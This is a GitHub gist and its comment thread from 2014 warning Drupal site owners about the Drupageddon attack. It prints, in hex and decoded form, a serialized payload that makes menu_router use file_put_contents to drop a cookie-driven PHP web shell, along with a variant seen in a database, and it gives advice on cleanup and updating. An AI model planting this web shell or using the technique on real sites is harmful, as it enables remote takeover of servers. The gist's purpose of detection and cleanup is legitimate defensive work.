Create a gist now

Instantly share code, notes, and snippets.

Remote code execution attempt: will insert this binary data into the menu_router table: #drupalsa05

0x613a323a7b693a303b733a32333a226d6f64756c65732f7379736c6f672f727068622e706870223b693a313b733a3134373a223c3f7068702024666f726d313d40245f434f4f4b49455b224b63716633225d3b206966202824666f726d31297b20246f70743d24666f726d312840245f434f4f4b49455b224b63716632225d293b202461753d24666f726d312840245f434f4f4b49455b224b63716631225d293b20246f707428222f3239322f65222c2461752c323932293b207d20706870696e666f28293b223b7d

This attack will add file_put_contents() as the access_callback in your menu_router table.

Subsequently, that path is used attempt to drop more exploit code.

Look in menu router for file_put_contents and remove it if found.

@joshkoenig
Owner

Translates out to serialized PHP:

a:2:{i:0;s:23:"modules/syslog/rphb.php";i:1;s:147:"<?php $form1=@$_COOKIE["Kcqf3"]; if ($form1){ $opt=$form1(@$_COOKIE["Kcqf2"]); $au=$form1(@$_COOKIE["Kcqf1"]); $opt("/292/e",$au,292); } phpinfo();";}
@joshkoenig
Owner

Seems like it is designed to drop a menu_router callback, and then hit it at a later date with an exploit payload in the cookie.

@baldwinlouie

This was a great heads up. I found a slight variant in one of my databases

+--------+----------------+------------------+-------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+----------------+-------------------+-----+--------------+---------+------------+----------+-------+----------------+-----------------+----------------+-----------------+------+-------------+----------+--------+--------------+
| path | load_functions | to_arg_functions | access_callback | access_arguments | page_callback | page_arguments | delivery_callback | fit | number_parts | context | tab_parent | tab_root | title | title_callback | title_arguments | theme_callback | theme_arguments | type | description | position | weight | include_file |
+--------+----------------+------------------+-------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+----------------+-------------------+-----+--------------+---------+------------+----------+-------+----------------+-----------------+----------------+-----------------+------+-------------+----------+--------+--------------+
| cuyyct | | | file_put_contents | a:2:{i:0;s:24:"modules/trigger/eygo.php";i:1;s:147:"<?php $form1=@$_COOKIE["Kcqf3"]; if ($form1){ $opt=$form1(@$_COOKIE["Kcqf2"]); $au=$form1(@$_COOKIE["Kcqf1"]); $opt("/292/e",$au,292); } phpinfo();";} | | NULL | | 0 | 0 | 0 | | | | | | | | 0 | cuyyct | | 0 | NULL |
+--------+----------------+------------------+-------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+----------------+-------------------+-----+--------------+---------+------------+----------+-------+----------------+-----------------+----------------+-----------------+------+-------------+----------+--------+--------------+

@joshkoenig
Owner

Looks like this is trying to drop different files depending on how it's constructed. You should see if there's a modules/trigger/eygo.php file in your codebase.

@joshkoenig
Owner

Also, update your site! :)

@baldwinlouie

There was a file in the codebase. I found the file when I tried to git pull my Drupal update and git complained of this file. Sites updated. Scary one though!

@tamerzg
tamerzg commented Oct 18, 2014

It seems that the file has random name and randomly gets inserted in one of the modules subdirectory, as i seen in in different directories on couple of my sites.
More info on how to find it and delete it: http://www.zoubi.me/blog/drupageddon-updating-drupal-732-not-enough-your-site-may-already-be-hacked

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment